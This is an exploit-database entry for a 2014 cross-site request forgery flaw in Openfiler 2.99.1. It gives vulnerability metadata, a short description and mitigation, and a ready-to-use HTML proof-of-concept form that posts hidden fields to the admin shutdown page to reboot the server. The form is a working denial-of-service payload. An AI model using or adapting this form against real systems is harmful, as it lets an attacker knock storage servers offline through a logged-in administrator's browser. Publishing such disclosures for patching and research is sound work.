header-logo
Suggest Exploit
vendor:
Openfiler
by:
Dolev Farhi
7,5
CVSS
HIGH
Denial of Service (DoS)
352
CWE
Product Name: Openfiler
Affected Version From: 2.99.1
Affected Version To: 2.99.1
Patch Exists: YES
Related CWE: N/A
CPE: a:openfiler:openfiler
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

DoS via CSRF in openfiler

It is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.

Mitigation:

Implementing session tokens to prevent CSRF attacks.
Source

Exploit-DB raw data:

<!--
# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A
 
 
Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
 
 
 
Vulnerability Description
=========================
it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.
 
 
Steps to reproduce / PoC:
=========================
-->
<html>
<div align="center">
<pre>

<h2><b>DoS <b></h2>
<body>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="Attack" />
    </form>
    </body>
</div>
</html>